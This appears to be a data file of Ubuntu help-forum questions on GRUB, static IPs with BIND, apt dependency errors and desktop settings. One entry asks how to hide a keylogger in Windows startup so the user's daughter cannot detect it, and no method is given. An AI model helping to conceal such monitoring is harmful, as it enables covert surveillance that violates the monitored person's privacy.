169929	error : no such partition after installing ubuntu 12.04	yesterday i decided to install ubuntu 12.04 as i have already installed windows 7 and want to go for dual boot . the problem is it does n't shows me the boot menu . this is what i get : error : no such partition grub rescue > first , i installed it manually and when i saw this message , i started searching for the solution . tried to fix it many ways - recommended boot repair , manual grub2 reinstall , grub2 upgrade , ensured that it 's in the right dev/sda drive and dev/sda7 partition ( in my case ) , but still the error occurs ... even when i used easybcd , i made a ubuntu boot entry but when i select it , the same happens . so , i deleted all linux partitions and tried automatically with the alongside option in the installer . the main partition was sda6 . well , it did n't fixed it again . after then i restored the original mbr of win7 and now i 'm writing you through it . here is the boot info script . what am i doing wrong ? another mess up happened , somehow after the alonside install and after i deleted its linux partitions . gparted shows that my logical partition ( local disk d ) have bad sectors and it is with extended file system , while acronis disk director and windows disk manager shows everything is ok and it is as it was before - ntfs file system . there 's no any data loss in that partition or problems , maybe its something from gparted ?
169930	how to customize xubuntu with remastersys ?	i 've been trying to make my own custom xubuntu-based distro . i thought i understood how to import settings and features and repackage using remastersys , but apparently not . one of the features involves removing the xfce4-panel and replacing it with cairo-dock ( with my own theme ) , but with each iso it keeps asking me to how i want to configure xfce4-panel and forgets about auto-starting cairo-dock . also when i do manually start cairo-dock it doesnât have the theme i designed selected by default . i made sure i selected my user-name when configuring remastersys , as well as copying over the files/directories from my home directory to /etc/skel/ . i even later moved my user-space over to /etc/skel/ , but to no avail . anybody know how what i 'm doing wrong ?
169934	quickly package/submitubuntu fails because of debhelper dependency	when running the submitubuntu or package command , i get this fatal error : quickly.templatetools.cantupdatefile : build-depends : debhelper ( > = 8 ) , was not found in the file myproject/debian/control . error : submitubuntu command failed the debhelper dependency in control is set by quickly itself , if i change it , it is changed back before packaging .
169936	how to compare two package version numbers	i 'm writing a script in php that needs to compare two package version numbers to determine which is newer . php has a handy function called version_compare ( ) , but it gets really confused with some of the more creative version numbers . for example , version_compare ( ) thinks that 0.9.8g-16ubuntu3.1 is newer than 0.9.8o-1ubuntu4.4 . anyone know how i can get this to work ? i 'm happy to run any command line scripts using exec ( ) .
169939	i am obliged to restart my computer savagely , when i lock the screen for a long time	i have a problem with my sony vaio svs1311f3e/w . when i log in , after have locked the screen for a long period of time , the screen will be black and i can see only the mouse , so i am obliged to restart my computer , savagely . processor : intel core i5-3210m . graphic card : intel hd graphics 4000 . ram : 4 go . os : ubuntu 12.04 .
169943	will a livecd with the nvidia proprietary drivers still work on intel or amd graphics ?	i have installed nvidia proprietary driver on livecd . will it break the 3d support for free drivers like intel or radeon etc ? the system is 12.04
169951	can not ping router with a static ip assigned ?	alright . i am running ubuntu lts 12.04 and am trying to configure a local caching/master dns server so i am using bind9 . first , here are some things via default dhcp : /etc/network/interfaces cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp # the primary network interface - static # auto eth0 # iface eth0 inet static # address 192.168.2.113 # netmask 255.255.255.0 # network 192.168.2.0 # broadcast 192.168.2.255 # gateway 192.168.2.1 # dns-search uclemmer.net # dns-nameservers 192.168.2.113 8.8.8.8 /etc/resolv.conf cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.2.1 search uclemmer.net ifconfig ifconfig eth0 link encap : ethernet hwaddr 00:14:2a:82 : d4:9e inet addr:192.168.2.103 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :214:2aff : fe82 : d49e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1067 errors:0 dropped:0 overruns:0 frame:0 tx packets:2504 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:153833 ( 153.8 kb ) tx bytes:214129 ( 214.1 kb ) interrupt:23 base address:0x8800 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:915 errors:0 dropped:0 overruns:0 frame:0 tx packets:915 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:71643 ( 71.6 kb ) tx bytes:71643 ( 71.6 kb ) ping ping -c 4 192.168.2.1 ping 192.168.2.1 ( 192.168.2.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.2.1 : icmp_req=1 ttl=64 time=0.368 ms 64 bytes from 192.168.2.1 : icmp_req=2 ttl=64 time=0.224 ms 64 bytes from 192.168.2.1 : icmp_req=3 ttl=64 time=0.216 ms 64 bytes from 192.168.2.1 : icmp_req=4 ttl=64 time=0.237 ms -- - 192.168.2.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2997ms rtt min/avg/max/mdev = 0.216/0.261/0.368/0.063 ms ping -c 4 google.com ping google.com ( 74.125.134.102 ) 56 ( 84 ) bytes of data . 64 bytes from www.google-analytics.com ( 74.125.134.102 ) : icmp_req=1 ttl=48 time=15.1 ms 64 bytes from www.google-analytics.com ( 74.125.134.102 ) : icmp_req=2 ttl=48 time=11.4 ms 64 bytes from www.google-analytics.com ( 74.125.134.102 ) : icmp_req=3 ttl=48 time=11.6 ms 64 bytes from www.google-analytics.com ( 74.125.134.102 ) : icmp_req=4 ttl=48 time=11.5 ms -- - google.com ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3003ms rtt min/avg/max/mdev = 11.488/12.465/15.118/1.537 ms ip route ip route default via 192.168.2.1 dev eth0 metric 100 192.168.2.0/24 dev eth0 proto kernel scope link src 192.168.2.103 as you can see , with dhcp everything seems to work fine . now , here are things with static ip : /etc/network/interfaces cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface # auto eth0 # iface eth0 inet dhcp # the primary network interface - static auto eth0 iface eth0 inet static address 192.168.2.113 netmask 255.255.255.0 network 192.168.2.0 broadcast 192.168.2.255 gateway 192.168.2.1 dns-search uclemmer.net dns-nameservers 192.168.2.1 8.8.8.8 i have tried dns-nameservers in various combos of *.2.1 , *.2.113 , and other reliable , public nameservers . /etc/resolv.conf cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.2.1 nameserver 8.8.8.8 search uclemmer.net obviously , when i change the nameservers in the /etc/network/interfaces file , the nameservers change here too . ifconfig ifconfig eth0 link encap : ethernet hwaddr 00:14:2a:82 : d4:9e inet addr:192.168.2.113 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :214:2aff : fe82 : d49e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1707 errors:0 dropped:0 overruns:0 frame:0 tx packets:2906 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:226230 ( 226.2 kb ) tx bytes:263497 ( 263.4 kb ) interrupt:23 base address:0x8800 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:985 errors:0 dropped:0 overruns:0 frame:0 tx packets:985 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:78625 ( 78.6 kb ) tx bytes:78625 ( 78.6 kb ) ping ping -c 4 192.168.2.1 ping 192.168.2.1 ( 192.168.2.1 ) 56 ( 84 ) bytes of data . -- - 192.168.2.1 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 3023ms ping -c 4 google.com ping : unknown host google.com lastly , here are my bind zone files : /etc/bind/named.conf.options cat /etc/bind/named.conf.options options { directory `` /etc/bind '' ; // // // query-source address * port 53 ; notify-source * port 53 ; transfer-source * port 53 ; // if there is a firewall between you and nameservers you want // to talk to , you may need to fix the firewall to allow multiple // ports to talk . see http : //www.kb.cert.org/vuls/id/800113 // if your isp provided one or more ip addresses for stable // nameservers , you probably want to use them as forwarders . // uncomment the following block , and insert the addresses replacing // the all-0 's placeholder . // forwarders { // 0.0.0.0 ; // } ; forwarders { // my local 192.168.2.113 ; // comcast 75.75.75.75 ; 75.75.76.76 ; // google 8.8.8.8 ; 8.8.4.4 ; // dnsadvantage 156.154.70.1 ; 156.154.71.1 ; // opendns 208.67.222.222 ; 208.67.220.220 ; // norton 198.153.192.1 ; 198.153.194.1 ; // verizon 4.2.2.1 ; 4.2.2.2 ; 4.2.2.3 ; 4.2.2.4 ; 4.2.2.5 ; 4.2.2.6 ; // scrubit 67.138.54.100 ; 207.255.209.66 ; } ; // // // //allow-query { localhost ; 192.168.2.0/24 ; } ; //allow-transfer { localhost ; 192.168.2.113 ; } ; //also-notify { 192.168.2.113 ; } ; //allow-recursion { localhost ; 192.168.2.0/24 ; } ; //======================================================================== // if bind logs error messages about the root key being expired , // you will need to update your keys . see https : //www.isc.org/bind-keys //======================================================================== dnssec-validation auto ; auth-nxdomain no ; # conform to rfc1035 listen-on-v6 { any ; } ; } ; /etc/bind/named.conf.local cat /etc/bind/named.conf.local // // do any local configuration here // // consider adding the 1918 zones here , if they are not used in your // organization //include `` /etc/bind/zones.rfc1918 '' ; zone `` example.com '' { type master ; file `` /etc/bind/zones/db.example.com '' ; } ; zone `` 2.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/zones/db.2.168.192.in-addr.arpa '' ; /etc/bind/zones/db.example.com cat /etc/bind/zones/db.example.com ; ; bind data file for example.com interface ; $ ttl 604800 @ in soa yossarian.example.com . root.example.com . ( 1343171970 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns yossarian.example.com . @ in a 192.168.2.113 @ in aaaa : :1 @ in mx 10 yossarian.example.com . ; yossarian in a 192.168.2.113 router in a 192.168.2.1 printer in a 192.168.2.200 ; ns01 in cname yossarian.example.com . www in cname yossarian.example.com . ftp in cname yossarian.example.com . ldap in cname yossarian.example.com . mail in cname yossarian.example.com . /etc/bind/zones/db.2.168.192.in-addr.arpa cat /etc/bind/zones/db.2.168.192.in-addr.arpa ; ; bind reverse data file for 2.168.192.in-addr interface ; $ ttl 604800 @ in soa yossarian.example.com . root.example.com . ( 1343171970 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns yossarian.example.com . @ in a 255.255.255.0 ; 113 in ptr yossarian.example.com . 1 in ptr router.example.com . 200 in ptr printer.example.com . ip route ip route default via 192.168.2.1 dev eth0 metric 100 192.168.2.0/24 dev eth0 proto kernel scope link src 192.168.2.113 i can ssh in to the machine locally at *.2.113 or at whatever address is dynamically assigned when in dhcp `` mode '' . *2.113 is in my router 's range and i have ports open and forwarding to the server . pinging is enabled on the router too . i briefly had a static configuration working but it died after the first reboot . please let me know what other info you might need . i am beyond frustrated/baffled .
169954	hiding startup items - key logger	i 'm a bit worried about what my daughter is getting up to online ( think she might be bullying someone online ) . i downloaded a very simple .exe key logger file that opens a temp folder on the c : drive and auto logs all keystrokes . i tried putting it into the startup folder and setting the attributes of the file as hidden , so she cant see it in the startup folder , but this stops the program from functioning altogether . is there a way of getting the program to run ( hidden ) where she ca n't find it ? i 'm not a very advanced computer user - although she is - and i need a foolproof method .
169959	high performance with xen , vmware or virtualbox	i was wondering which is the best method to go about if i want to play win based games . i do not want to go with the dual boot method as this will cost me time to restart , login and run a os to do my work or pass the time , and some of my apps rely on win and my graphics to run . for example daz3d , photoshop , flash etc . now i read about hvm ( hardware virtual machines ) and then i know about the 3d virtualisation of vmware and virtualbox . how ever the 2 later virtualise the 3d not using the full power of the gpu . so this option wont perform perfect for latest games like d3 . i was wondering if anyone have experience in hvm ( like xen if i am not mistaken ) and tried something similar to access the full power of the gpu and successfully run newer games and other products relying on the gpu ? will be the first time setting up a hvm , no experience in this so do n't know what to expect . this will help a lot as i do not want to revert back to win or as mentioned do dual boot .
169966	wireless is disabled by hardware switch ( wubi ) on a toshiba tecra s1	i 'm using toshiba tecra s1 and it has a problem in ubuntu 12.04 i installed ubuntu with wubi but it says wireless is disabled by hardware switch and i tried to off airplane mode and # rfkill unblock all and fn keys does n't work , help me
169972	an snmp application is listening on port 161 , how do i shut it down ?	after the installation of jira application on ubuntu server 10.04 64 bit server , i performed a va ( vulnerability assessment ) on the server using nexpol community editon . i got the va report the app . in the report it says i am running snmp on the server on default port 161 udp . how do i stop it ? but in the process also its not showing anything .
169976	micro sd card with adaptor in ubuntu 12.04 only mount read-only	i am trying to mount a micros sd card with adaptor in ubuntu 12.04 but it will only mount if i lock the adaptor before putting the card in and thus get a read only mounted card . if i do not lock the adaptor before i can not see the card . in windows i do not have any problem , the card will mount read/write without any problem . any idea what to do in order to get it working read/write in ubuntu ?
169977	prevent synctex from opening new instance evince ?	i 'm using the synctex plugin in gedit and it seems that ctrl-clicking in gedit ( forward-searching ) opens up a new instance of evince even if there was already an instance open . is there a way to prevent this from happening ? the synctex forward search clearly calls evince in a way that is not the same as e.g . nautilus would . by the way , i compile my tex files with a script using the `` external tools '' plugin . the line that opens the pdf file uses xdg-open .
169980	installable distro with customised kernel and selected packages	how do i create a custom distro . i have a - minimal installation with preempt rt patched kernel - no graphic desktop - it is a text based system for embedded application - a selected set of packages i need this to me converted into an installable iso image . the installer cab also be text based can anyone help thanks and regards partha
169982	eth0 is not present in interfaces still it connects at boot	i am connected through my eth0 to my university network . the c onnection works with no problems . still i wander why the eth0 is not present in interfaces . i run ubuntu 12.04 ans use shorewall thanks vanja
169988	ubuntu server wo n't start	i just installed ubuntu server again . i 've done that quite a few times before . i try starting the system and get to the point where it changes the font on the screen . a little while after that the monitor flickers and i just get a black screen . after that it flickers some more and does n't respond to anything . the weird thing comes when i boot into recovery mode . if i select resume boot ( without even doing anything else ) it resumes boot and finishes booting , giving me a shell . it definitely is n't just a graphics problem either since ssh wo n't respond ( after resume boot it will let me in ) . i put the syslog and the output of dmesg here . i ca n't distinguish between the failed startups and the successful ones .
169989	why is my dualboot system asking for `` grub '' ?	i switched on my laptop and it asked me for grub . i do n't know what that means . i use both windows and ubuntu . this is what it said : gnu grub version1.99-12ubuntu5 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . any where else tab lists possible or file completions . i 'm stuck , please help . thanks .
169990	how to set default paragraph style to `` normal '' in email replies in evolution ?	when i answer an email in evolution 3.2.3 ( ubuntu 12.04 ) the new text i write has the paragraph style `` normal '' and is wrapped , but the quoted text of the email i answer to has the paragraph style `` preformatted '' and is not wrapped . as my screen is only 15 inch although wide , i normally do n't see to whole text . i need to change the paragraph style manually for the quoted email part to `` normal '' so the next is wrapped and readable without the need to scroll to to side every line . it does not matter whether i change the email to html ( from text ) or change the reply style . is there a way to set the the default paragraph style for the whole answer email to `` normal '' ? i thought it was different in previous version of evolution ( this `` new behaviour '' happens at least since ubuntu 10.10 , evolution 2.30.3 ) , but i do n't know exactly when the change happened .
169991	ioerror : [ errno 5 ] input/output error : '~.cache/software-center/software-center.log '	for some reason ubuntu software center will not open , i have tried reinstalling it however no luck still wo n't open . here is the error output i got via a traceback ! file `` /usr/bin/software-center '' , line 40 , in < module > import softwarecenter.log file `` /usr/share/software-center/softwarecenter/log.py '' , line 119 , in < module > logfile_path , maxbytes=100 * 1000 , backupcount=5 ) file `` /usr/lib/python2.7/logging/handlers.py '' , line 118 , in __init__ baserotatinghandler.__init__ ( self , filename , mode , encoding , delay ) file `` /usr/lib/python2.7/logging/handlers.py '' , line 65 , in __init__ logging.filehandler.__init__ ( self , filename , mode , encoding , delay ) file `` /usr/lib/python2.7/logging/__init__.py '' , line 897 , in __init__ streamhandler.__init__ ( self , self._open ( ) ) file `` /usr/lib/python2.7/logging/__init__.py '' , line 916 , in _open stream = open ( self.basefilename , self.mode ) ioerror : [ errno 5 ] input/output error : '/home/shaq/.cache/software-center/software-center.log' hope someone can help me out with this and help me fix this . this error occured after i installed updates . i 'm using ubuntu 12.04
169992	what computer-assisted translation ( cat ) software is available ?	i am translator and i would like to know if there is any computer assisted translation tool to use with ubuntu . i 've heard about programs such as swordfish and so on . does anybody know how is it and where can i get it ?
169994	i ca n't run apt-get -f install : lib & package errors	here is the output when i try to run apt-get -f install : root @ ubuntu : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : sound-theme-freedesktop squid3-common manpages-dev git-man rpm-common mysql-common linux-libc-dev xbitmaps autotools-dev libssl-doc xdg-utils libsnmp-base use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libaccess-bridge-java the following packages will be removed : accountsservice adduser ant ant-optional apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common apparmor apport apt apt-transport-https apt-utils apt-xapian-index aptitude aspell aspell-en at autoconf automake awstats base-files base-passwd bash bash-completion bc bcrelay bind9 bind9-host bind9utils binfmt-support binutils bittorrent bsdmainutils bsdutils busybox-initramfs byobu bzip2 ca-certificates ca-certificates-java cli-common command-not-found console-setup consolekit coreutils cpio cpp cpp-4.6 cron cryptsetup cvs dash db4.8-util db4otool dbconfig-common dbus dbus-x11 dconf-gsettings-backend debconf debconf-i18n debianutils default-jdk default-jre default-jre-headless deluge deluge-common deluge-gtk dictionaries-common diffutils dmidecode dmsetup dnsutils dosfstools dpkg e2fslibs e2fsprogs eclipse-rcp ecryptfs-utils ed eject fastjar file findutils fontconfig fontconfig-config friendly-recovery ftp fuse-utils gamin gcc gcc-4.6 gcj-4.6-jre-lib gettext-base gir1.2-glib-2.0 git glib-networking gnupg gpgv grep groff-base grub-common grub-gfxpayload-lists grub-pc grub-pc-bin grub2-common gsettings-desktop-schemas gvfs gvfs-bin gzip hdparm hostname htop hunspell-en-us icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx ifstat ifupdown info initramfs-tools initramfs-tools-bin initscripts insserv install-info iperf iproute iptables iptraf iputils-ping iputils-tracepath irqbalance isc-dhcp-client isc-dhcp-common jarwrapper junit junit4 kbd keyboard-configuration keyutils klogd landscape-common language-selector-common laptop-detect less libaccess-bridge-java-jni libaccountsservice0 libacl1 libapache-ruby1.8 libapache2-mod-perl2 libapache2-mod-php5 libapache2-mod-python libapache2-mod-ruby libapache2-reload-perl libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap libapt-inst1.3 libapt-pkg4.11 libart-2.0-2 libasound2 libaspell15 libasyncns0 libatasmart4 libatk1.0-0 libattr1 libavahi-client3 libavahi-common3 libavahi-glib1 libbind9-60 libblas3gf libblkid1 libbonobo2-0 libboost-filesystem1.46.1 libboost-iostreams1.46.1 libboost-python1.46.1 libboost-system1.46.1 libboost-thread1.46.1 libbsd-resource-perl libbsd0 libbz2-1.0 libc-dev-bin libc6 libc6-dev libcairo-gobject2 libcairo2 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra0 libcap-ng0 libcap2 libck-connector0 libclass-accessor-perl libclass-isa-perl libcomerr2 libcommons-beanutils-java libcommons-compress-java libcommons-digester-java libcommons-el-java libcommons-httpclient-java libcommons-logging-java libcroco3 libcups2 libcurl3 libcurl3-gnutls libcwidget3 libdatrie1 libdb-java libdb-je-java libdb4.7 libdb4.8 libdb4o8.0-cil libdb5.1 libdb5.1-java libdb5.1-java-gcj libdbd-mysql-perl libdbi-perl libdbus-1-3 libdbus-glib-1-2 libdevel-symdump-perl libdevmapper-event1.02.1 libdevmapper1.02.1 libdns69 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libecryptfs0 libedit2 libelf1 libenchant1c2a libencode-locale-perl libept1 liberror-perl libexpat1 libffi6 libfile-basedir-perl libfile-copy-recursive-perl libfile-desktopentry-perl libfile-listing-perl libfile-mimeinfo-perl libflac8 libfont-afm-perl libfontconfig1 libfontenc1 libfreetype6 libfribidi0 libfs6 libfuse2 libgail18 libgamin0 libgc1c2 libgcc1 libgcj-bc libgcj-common libgcj12 libgcrypt11 libgd2-xpm libgdbm3 libgdk-pixbuf2.0-0 libgdu0 libgeo-ipfree-perl libgeoip1 libgfortran3 libgif4 libgirepository-1.0-1 libgl1-mesa-dri libgl1-mesa-glx libglade2-0 libglapi-mesa libglib2.0-0 libgmp10 libgnome-keyring0 libgnomecanvas2-0 libgnutls26 libgomp1 libgpg-error0 libgpm2 libgssapi-krb5-2 libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2.0-0 libgtk2.0-bin libgudev-1.0-0 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-template-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libhunspell-1.2-0 libice-dev libice6 libicu44 libicu4j-java libidl0 libidn11 libio-socket-ssl-perl libio-string-perl libisc62 libisccc60 libisccfg62 libiw30 libjasper-java libjasper1 libjline-java libjpeg62 libjson0 libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 liblapack3gf liblcms1 libldap-2.4-2 libllvm2.9 liblocale-gettext-perl liblockfile1 libltdl-dev libltdl7 liblua5.1-0 liblvm2app2.2 liblwp-mediatypes-perl liblwp-protocol-https-perl liblwres60 liblzma2 libmagic1 libmailtools-perl libmcrypt4 libmikmod2 libmono-corlib4.0-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-posix4.0-cil libmono-security4.0-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libmount1 libmpc2 libmpfr4 libmysqlclient16 libncurses5 libncursesw5 libnet-daemon-perl libnet-http-perl libnet-ssleay-perl libnet-xwhois-perl libnewt0.52 libnfnetlink0 libnih-dbus1 libnih1 libnl3 libnotify4 libnspr4 libnss3 libnss3-1d libogg0 libopts25 liborbit2 libpam-ck-connector libpam-modules libpam-modules-bin libpam-runtime libpam0g libpango1.0-0 libparse-debianchangelog-perl libparted0debian1 libpcap0.8 libpci3 libpciaccess0 libpcre3 libpcsclite1 libperl5.12 libpipeline1 libpixman-1-0 libplrpc-perl libplymouth2 libpng12-0 libpod-plainer-perl libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpopt0 libportmidi0 libproxy0 libpulse0 libpython2.7 libquadmath0 libreadline5 libreadline6 libregexp-java librpm2 librpmbuild2 librpmio2 librpmsign0 librsvg2-2 librsvg2-common librtmp0 libruby1.8 libsasl2-2 libsasl2-modules libsdl-image1.2 libsdl-mixer1.2 libsdl-ttf2.0-0 libsdl1.2debian libsdl1.2debian-alsa libselinux1 libsensors4 libservlet2.4-java libsgutils2-2 libsigc++-2.0-0c2a libslang2 libsm-dev libsm6 libsmpeg0 libsndfile1 libsnmp15 libsoup2.4-1 libsqlite3-0 libss2 libssl-dev libssl1.0.0 libstdc++6 libsub-name-perl libswitch-perl libt1-5 libtasn1-3 libtdb1 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl libthai0 libtiff4 libtimedate-perl libtinfo5 libtool libtorrent-rasterbar6 libudev0 liburi-perl libusb-0.1-4 libusb-1.0-0 libutempter0 libuuid1 libvorbis0a libvorbisenc2 libvorbisfile3 libwebkitgtk-1.0-0 libwrap0 libwww-perl libwww-robotrules-perl libx11-6 libx11-dev libxapian22 libxau-dev libxau6 libxaw7 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb1 libxcb1-dev libxcomposite1 libxcursor1 libxdamage1 libxdmcp-dev libxdmcp6 libxerces2-java libxext6 libxfixes3 libxfont1 libxft2 libxi6 libxinerama1 libxkbfile1 libxml2 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxslt1.1 libxt-dev libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 linux-generic-pae linux-headers-3.0.0-12 linux-headers-3.0.0-12-generic-pae linux-headers-generic-pae linux-image-3.0.0-12-generic-pae linux-image-generic-pae locales lockfile-progs login logrotate lsb-base lsb-release lshw lsof ltrace m4 makedev man-db mawk mc memtest86+ mlocate module-init-tools mono-4.0-gac mono-gac mono-runtime mount mountall mtools mtr-tiny multiarch-support mysql-client mysql-client-5.1 mysql-client-core-5.1 mysql-server mysql-server-5.1 mysql-server-core-5.1 nano ncurses-bin net-acct net-tools netbase netcat-openbsd notification-daemon ntfs-3g ntp ntpdate openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssh-client openssh-server openssl os-prober parted passwd patch pciutils perl perl-base perl-modules php-auth-sasl php-db php-mail php-net-smtp php-net-socket php-pear php5 php5-cli php5-common php5-curl php5-dev php5-gd php5-mcrypt php5-mysql php5-xcache php5-xsl phpmyadmin plymouth plymouth-theme-ubuntu-text policykit-1 policykit-1-gnome popularity-contest powermgmt-base ppp pppconfig pppoeconf pppstatus pptpd procps proftpd-basic psmisc python python-apport python-apt python-apt-common python-bittorrent python-cairo python-chardet python-crypto python-dbus python-debian python-gdbm python-glade2 python-gnupginterface python-gobject python-gobject-2 python-gobject-cairo python-gtk2 python-httplib2 python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libtorrent python-minimal python-newt python-notify python-numpy python-oauth python-openssl python-pam python-pexpect python-pkg-resources python-problem-report python-pycurl python-pygame python-serial python-simplejson python-smartpm python-support python-twisted-bin python-twisted-core python-twisted-web python-wadllib python-xapian python-xdg python-zope.interface python2.7 python2.7-minimal readline-common rpm rpm2cpio rsync sat4j screen sed shared-mime-info shtool squid3 ssh-import-id ssl-cert strace sudo sysklogd sysv-rc sysvinit-utils tar tasksel tasksel-data tcpd tcpdump telnet time tzdata tzdata-java ubuntu-standard ucf udev udisks ufw unzip update-inetd update-manager-core upstart ureadahead usbutils util-linux uuid-runtime vim vim-common vim-tiny vlan vnc4server w3m wget whiptail wireless-crda wireless-tools wpasupplicant x11-apps x11-common x11-session-utils x11-utils x11-xfs-utils x11-xkb-utils x11-xserver-utils xauth xbase-clients xfonts-base xfonts-encodings xfonts-utils xinetd xinit xml-core xterm xz-utils zip zlib1g zlib1g-dev the following packages will be upgraded : libaccess-bridge-java warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! apt libapt-pkg4.11 ( due to apt ) libc6 ( due to apt ) libgcc1 ( due to apt ) libstdc++6 ( due to apt ) zlib1g ( due to apt ) gnupg ( due to apt ) base-files mawk ( due to base-files ) base-passwd bash debianutils ( due to bash ) dash ( due to bash ) libncurses5 ( due to bash ) bsdutils coreutils libacl1 ( due to coreutils ) libattr1 ( due to coreutils ) libselinux1 ( due to coreutils ) dpkg ( due to dash ) diffutils libbz2-1.0 ( due to dpkg ) tar ( due to dpkg ) xz-utils ( due to dpkg ) e2fsprogs e2fslibs ( due to e2fsprogs ) libblkid1 ( due to e2fsprogs ) libcomerr2 ( due to e2fsprogs ) libss2 ( due to e2fsprogs ) libuuid1 ( due to e2fsprogs ) util-linux ( due to e2fsprogs ) findutils grep install-info ( due to grep ) gzip hostname upstart ( due to hostname ) login libpam0g ( due to login ) libpam-runtime ( due to login ) libpam-modules ( due to login ) mount libmount1 ( due to mount ) ncurses-bin libtinfo5 ( due to ncurses-bin ) perl-base python-minimal python2.7-minimal ( due to python-minimal ) sed lsb-base ( due to util-linux ) tzdata ( due to util-linux ) debconf ( due to util-linux ) libslang2 ( due to util-linux ) 1 upgraded , 0 newly installed , 710 to remove and 16 not upgraded . 3 not fully installed or removed . need to get 410 kb of archives . after this operation , 1,241 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] y abort . root @ ubuntu : ~ #
170003	any experience with macbook air 5.2 ?	our company has purchased a macbook air 5.2 ( 13 inch screen ) and we want to run linux on it , with preference for ubuntu . my first attempt failed . i prepared a usb stick as boot device following the instructions on http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx . however trying to boot from that stick i got a kernel panic . any help on how to go on is welcome !
170007	id command with and without user specified	as in the title , i wonder why there exists any difference as below : issue `` id '' without username : ygl @ lyg-virtualbox : ~ $ id uid=1001 ( ygl ) gid=1002 ( ygl ) groups=1002 ( ygl ) ,112 ( nopasswdlogin ) with the logged-in username : ygl @ lyg-virtualbox : ~ $ id ygl uid=1001 ( ygl ) gid=1002 ( ygl ) groups=1002 ( ygl ) ,112 ( nopasswdlogin ) ,1000 ( lyg ) ,1001 ( vboxsf ) are there any places other than /etc/group that store secondary groups for a user ?
170008	need a firewall application similar to one that ships with fedora	i 've used ubuntu since more than a year now , as the oneiric ocelot has more than exceeded my expectations and provides most things out of the box . however , there is one feature that both windows and fedora provides - a network firewall that allows us to block specific incoming/outgoing ports such as http ( 80 ) , ftp ( 21 ) , etc . i 've seen it on fedora17 . since i 'm going to learn some network programming , such a firewall will be very much useful for my development and testing . is there any such equivalent ( and reliable ) package in ubuntu repository ? i 'm aware that i can not fetch anything from the fedora repo as they are in rpm formats , and also do n't want to mess something with my ubuntu deb packaging .
170016	is there a task switcher ( alt+tab ) for xfce that allows to select application using a mouse click ?	i feel that the standard task switcher under xfce is n't very good . for example it does n't allow you to select an application by mouse clicking on it . on windows for example , there is a program called taskswitchxp , which greatly extends the standard functionality of alt+tab . in additional it allows you to select an application by a mouse click . is there a program with such functionality for linux ?
